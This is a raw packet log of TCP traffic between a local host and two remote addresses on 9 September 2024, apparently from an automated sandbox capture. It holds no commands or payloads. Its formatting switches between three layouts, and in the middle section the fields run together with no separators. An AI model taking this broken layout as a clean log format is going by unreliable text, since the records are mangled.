Sep 9, 2024 17:49:10.565650940 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.566762924 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.566797018 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.566808939 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.566817045 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.566843033 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.566901922 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.568789005 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.568815947 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.568852901 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.568852901 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.568864107 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.633096933 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.633172035 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.633188963 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.633234024 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.633255959 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.652106047 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.652169943 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.652172089 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.652194023 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.652218103 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.652223110 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
                                              Sep 9, 2024 17:49:10.652251005 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.653320074 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.653383970 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.653394938 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.653419018 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.653440952 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.654530048 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.654583931 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.654596090 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.654619932 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.654660940 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.654668093 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.655860901 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.655905962 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.655920982 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.655936003 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.655977011 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.655982018 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.657228947 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.657284975 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.657299995 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.657324076 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.657350063 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.674901962 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.674958944 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.674967051 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.674992085 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.675014973 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.717343092 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.717402935 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.717417002 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.717441082 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.717468977 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.718198061 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.718245983 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.718255997 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.718271017 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.718308926 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.718313932 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.739702940 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.739758015 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.739772081 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.739794970 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.739828110 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.740617037 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.740670919 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.740679979 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.740701914 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.740731955 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.740744114 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.740983963 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.741031885 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.741044998 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.741087914 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.741781950 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.741837978 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.741846085 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.741867065 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.741888046 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.745193958 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.745250940 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.745264053 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.745287895 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.745317936 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.783036947 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.783099890 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.783098936 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.783123970 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.783159018 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.804187059 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.804231882 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.804248095 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.804264069 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.804280996 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.805242062 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.805272102 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.805289030 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.805299044 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.805313110 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.805314064 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.826533079 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.826603889 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.826606989 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.826634884 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.826659918 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.827430010 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.827480078 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.827490091 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.827506065 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.827554941 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.827560902 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.828500986 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.828556061 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.828569889 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.828594923 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.828619957 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.829371929 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.829422951 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.829432011 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.829447985 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.829482079 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.829487085 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.830286980 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.830344915 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.830353975 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.830375910 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.830409050 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.869955063 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.869992971 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.870018959 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.870033979 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.870045900 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.870085001 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.891190052 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.891242981 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.891266108 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.891277075 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.891289949 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.891330957 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.892405033 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.892436981 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.892453909 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.892462015 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.892473936 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.892482996 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.913518906 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.913579941 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.913595915 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.913626909 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.913652897 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.914616108 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.914668083 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.914678097 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.914702892 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.914724112 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.915698051 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.915750027 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.915766954 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.915791035 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.915815115 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.916670084 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.916723013 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.916732073 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.916755915 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.916788101 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.917494059 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.917550087 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.917565107 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.917589903 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.917619944 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.957089901 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.957175016 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.957179070 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.957207918 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.957230091 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.978792906 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.978876114 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:10.978904963 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.978940964 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:10.978965044 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.000390053 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.000428915 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.000452042 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.000473976 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.000487089 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.000487089 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.000499010 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.001338959 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.001375914 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.001388073 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.001399994 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.001420975 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.001451969 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.001894951 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.001925945 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.001946926 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.001954079 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.001965046 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.002702951 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.002738953 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.002758980 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.002768040 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.002780914 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.003720045 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.003748894 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.003771067 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.003786087 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.003796101 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.003813982 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.004688025 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.004724979 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.004734039 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.004741907 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.004761934 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.004935026 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.044152975 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.044239998 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.044250011 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.044284105 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.044302940 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.065326929 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.065381050 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.065404892 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.065438032 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.065452099 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.065479994 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.088407993 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.088449001 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.088473082 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.088511944 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.088526011 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.088526011 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.089327097 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.089361906 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.089379072 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.089390039 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.089404106 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.089416981 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.090246916 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.090276957 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.090306044 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.090317965 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.090332985 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.091192007 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.091238976 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.091250896 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.091268063 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.091300011 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.092144012 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.092174053 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.092195988 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.092206955 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.092221022 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.092232943 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.093038082 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.093079090 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.093096018 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.093103886 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.093116999 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.093127966 CEST49168443192.168.2.22207.241.227.96
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Sep 9, 2024 17:49:11.093147993 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.131066084 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.131103039 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.131153107 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.131187916 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.131201982 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.131222963 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.152254105 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.152287006 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.152317047 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.152340889 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.152355909 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.152355909 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.154217005 CEST  49167        80         192.168.2.22     185.235.137.223
Sep 9, 2024 17:49:11.353569984 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.399718046 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.399746895 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.399771929 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.399816990 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.399837971 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.399859905 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.399889946 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.399920940 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.399935961 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.399964094 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.400670052 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.400688887 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.400707960 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.400731087 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.400743008 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.400755882 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.400779963 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.400799036 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.400800943 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.400826931 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.400832891 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.400850058 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.400866985 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.401643038 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.401680946 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.401710987 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.401711941 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.401731014 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.401757956 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.401771069 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.401788950 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.402574062 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.402637959 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.402643919 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.402672052 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.402713060 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.403588057 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.403649092 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.403651953 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.403672934 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.403711081 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.404486895 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.404551029 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.404558897 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.404583931 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.404624939 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.405349016 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.405410051 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.405411959 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.405431032 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.405462027 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.406146049 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.406209946 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.406213999 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.406236887 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.406276941 CEST  49168        443        192.168.2.22     207.241.227.96
